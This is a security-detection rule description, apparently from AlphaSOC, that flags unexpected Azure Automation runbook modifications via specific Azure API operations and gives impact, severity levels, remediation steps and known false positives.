Unexpected Azure API calls indicating Automation runbook modification
Description
AlphaSOC detected modifications to an Azure Automation runbook via
Microsoft.Automation/automationAccounts/runbooks/publish/action,
Microsoft.Automation/automationAccounts/runbooks/draft/write, or
Microsoft.Automation/automationAccounts/runbooks/write operations. Adversaries
may modify existing runbooks to inject malicious code or backdoors, leveraging
the trusted automation infrastructure to execute unauthorized commands. This
technique enables persistence and execution of malicious activities within the
cloud environment.
Impact
Modified runbooks can execute malicious code with the permissions of the Automation Account, potentially affecting multiple Azure resources. Attackers may use this technique to maintain persistent access, steal credentials, manipulate data, or pivot to other systems. The legitimate appearance of modified runbooks can make detection challenging.
Severity
| Severity | Condition |
|---|---|
Low | Unexpected action or ASN |
Medium | Two unexpected properties at the same time |
Investigation and Remediation
Review the runbook's modification history and compare the current version with previous versions to identify changes. Verify the identity of the user who made the modifications and confirm the changes were authorized. Examine the modified code for suspicious commands, encoded payloads, or external connections. If unauthorized changes are detected, restore the runbook to a known good state and investigate the user's account for compromise.
Known False Positives
- Routine updates to automation scripts by administrators
- DevOps teams modifying runbooks as part of normal workflows
- Scheduled maintenance or improvements to existing automation